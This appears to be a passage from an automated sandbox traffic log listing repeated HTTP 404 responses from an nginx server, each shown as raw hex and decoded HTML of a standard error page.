Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:34:47 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:34:52 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:35:13 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:35:17 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:35:21 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:35:25 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:35:28 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:35:32 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:35:52 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
